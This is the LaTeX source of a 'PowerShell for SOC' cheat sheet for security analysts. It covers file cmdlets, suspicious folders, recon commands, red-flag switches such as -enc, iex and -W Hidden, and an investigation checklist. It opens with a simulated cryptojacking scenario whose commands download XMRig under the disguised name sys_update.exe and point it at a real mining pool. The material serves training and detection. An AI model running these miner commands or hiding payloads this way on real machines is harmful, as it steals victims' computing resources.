\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr}           % For header and footer
\usepackage{multicol}           % Allows multicols in tables
\usepackage{tabularx}           % Intelligent column widths
\usepackage{tabulary}           % Used in header and footer
\usepackage{hhline}             % Border under tables
\usepackage{graphicx}           % For images
\usepackage{xcolor}             % For hex colours
%\usepackage[utf8x]{inputenc}    % For unicode character support
\usepackage[T1]{fontenc}        % Without this we get weird character replacements
\usepackage{colortbl}           % For coloured tables
\usepackage{setspace}           % For line height
\usepackage{lastpage}           % Needed for total page number
\usepackage{seqsplit}           % Splits long words.
%\usepackage{opensans}          % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem}     % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath}            % Symbols
\usepackage{MnSymbol}           % Symbols
\usepackage{wasysym}            % Symbols
%\usepackage[english,german,french,spanish,italian]{babel}              % Languages

% Document Info
\author{levko}
\pdfinfo{
  /Title (powershell-for-soc.pdf)
  /Creator (Cheatography)
  /Author (levko)
  /Subject (PowerShell for SOC Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit
% This two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{A03EA3}
\definecolor{LightBackground}{HTML}{F9F2F9}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
    \SetRowColor{DarkBackground}
    \vspace{-7pt}
    {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
        \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
    }
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
    \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{PowerShell for SOC Cheat Sheet}}}} \\
    \normalsize{by \textcolor{DarkBackground}{levko} via \textcolor{DarkBackground}{\uline{cheatography.com/217993/cs/48039/}}}
\end{tabulary}
\end{multicols}}

\fancyfoot[L]{ \footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
  \SetRowColor{FootBackground}
  \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}}  \\
  \vspace{-2pt}levko \\
  \uline{cheatography.com/levko} \\
  \end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}}  \\
   \vspace{-2pt}Not Yet Published.\\
   Updated 4th May, 2026.\\
   Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}}  \\
  \SetRowColor{white}
  \vspace{-5pt}
  %\includegraphics[width=48px,height=48px]{dave.jpeg}
  Measure your website readability!\\
  www.readability-score.com
\end{tabulary}
\end{multicols}}




\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.

\begin{multicols*}{2}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Crypto Mining (XMRig)}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Scenario:}} An attacker wants to use your company's electricity and CPU power to make money. They usually hide the miner in a temp folder.} \tn 
% Row Count 3 (+ 3)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{`curl.exe -L -o C:\textbackslash{}temp\textbackslash{}sys\_update.exe https://github.com/xmrig `} \tn 
% Row Count 5 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{`C:\textbackslash{}temp\textbackslash{}sys\_update.exe -o pool.supportxmr.com:443 -u {[}Wallet\_Address{]} -p Lab\_Worker\_01 `} \tn 
% Row Count 7 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{How to run workshop}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{`Invoke-WebRequest -Uri {[}Workshop URL ask Yarin{]} -OutFile "C:\textbackslash{}Users\textbackslash{}Administrator\textbackslash{}Desktop\textbackslash{}workshop.ps1" `} \tn 
% Row Count 3 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{5.36 cm} x{2.64 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{File Management}}  \tn
% Row 0
\SetRowColor{LightBackground}
`New-Item -ItemType Directory -Path "C:\textbackslash{}temp\textbackslash{}data"` & {\bf{Creates a Folder}} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
`New-Item -ItemType File -Path "C:\textbackslash{}temp\textbackslash{}note.txt"` & {\bf{Creates a File}} \tn 
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
`Get-Content -Path "C:\textbackslash{}temp\textbackslash{}config.txt"` & {\bf{Reads a File}} \tn 
% Row Count 6 (+ 2)
% Row 3
\SetRowColor{white}
`Add-Content -Path "C:\textbackslash{}temp\textbackslash{}note.txt" -Value "Hacked"` & {\bf{Edits a File}} \tn 
% Row Count 9 (+ 3)
% Row 4
\SetRowColor{LightBackground}
`Remove-Item -Path "C:\textbackslash{}temp\textbackslash{}note.txt"` & {\bf{Deletes a File}} \tn 
% Row Count 11 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{The "Dirty" Folders (Common Hiding Places)}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{If you see a file being created or run from these paths, it is {\bf{highly suspicious}}:} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{`C:\textbackslash{}Users\textbackslash{}Public`} \tn 
% Row Count 3 (+ 1)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{`C:\textbackslash{}Windows\textbackslash{}Temp`} \tn 
% Row Count 4 (+ 1)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{`C:\textbackslash{}Users\textbackslash{}{[}User{]}\textbackslash{}AppData\textbackslash{}Local\textbackslash{}Temp`} \tn 
% Row Count 5 (+ 1)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{`C:\textbackslash{}ProgramData`} \tn 
% Row Count 6 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{1.444 cm} x{3.116 cm} x{3.04 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{3}{x{8.4cm}}{\bf\textcolor{white}{Identity \& Host Recon}}  \tn
% Row 0
\SetRowColor{LightBackground}
\seqsplit{`whoami`} & Shows the name of the logged-in user. & Look for this running immediately after a suspicious login. \tn 
% Row Count 4 (+ 4)
% Row 1
\SetRowColor{white}
\seqsplit{`\$env:COMPUTERNAME`} & Displays the name of the computer you are on. & Often the first thing an automated script checks. \tn 
% Row Count 8 (+ 4)
% Row 2
\SetRowColor{LightBackground}
\seqsplit{`Get-Process`} & Lists every program (process) currently running. & Look for processes with "odd" names or no description. \tn 
% Row Count 12 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}---}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{3.12 cm} x{4.88 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{PowerShell "Smell Test" (The Red Flags)}}  \tn
% Row 0
\SetRowColor{LightBackground}
`-enc` / \seqsplit{`-EncodedCommand`} & Hides the command in scrambled text. Top priority alert. \tn 
% Row Count 3 (+ 3)
% Row 1
\SetRowColor{white}
`iex` \seqsplit{(Invoke-Expression)} & "Download and run." This is how fileless malware starts. \tn 
% Row Count 6 (+ 3)
% Row 2
\SetRowColor{LightBackground}
`-Bypass` & Tells Windows to ignore security policies. \tn 
% Row Count 8 (+ 2)
% Row 3
\SetRowColor{white}
`-W Hidden` & Runs the script silently so the user can't see it. \tn 
% Row Count 11 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{The five golden steps for De-Core Investigation}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{1. Check the Parent: Did a suspicious app like Word or Excel launch PowerShell?} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{2. The Smell Test: Look for hidden, scrambled text or "iex" flags in the command.} \tn 
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{3. Follow the Wire: Flag PowerShell connecting to unknown websites or downloading files.} \tn 
% Row Count 6 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{4. Verify User: Does this specific user have a business reason to run admin scripts?} \tn 
% Row Count 8 (+ 2)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{5. Trace the Files: Watch for new files created in "Dirty Folders" or evidence being deleted.} \tn 
% Row Count 10 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{2.204 cm} x{2.66 cm} x{2.736 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{3}{x{8.4cm}}{\bf\textcolor{white}{Basic \& Network Commands}}  \tn
% Row 0
\SetRowColor{LightBackground}
`curl.exe -O {[}URL{]}` & Used to "call" a website or download a file from a remote server. & Critical: Check the URL. Is it a known site or a strange IP address? \tn 
% Row Count 5 (+ 5)
% Row 1
\SetRowColor{white}
`wget.exe {[}URL{]} -OutFile {[}Name{]}` & Similar to curl; used to download tools or malware from the internet. & PowerShell using wget.exe to save a file in C:\textbackslash{}Temp is highly suspicious. \tn 
% Row Count 11 (+ 6)
% Row 2
\SetRowColor{LightBackground}
\seqsplit{`Get-NetTCPConnection`} & Shows every active "phone call" the computer is making to other computers. & Look for the State = Established column to see who the machine is talking to right now. \tn 
% Row Count 18 (+ 7)
\hhline{>{\arrayrulecolor{DarkBackground}}---}
\end{tabularx}
\par\addvspace{1.3em}


% That's all folks
\end{multicols*}

\end{document}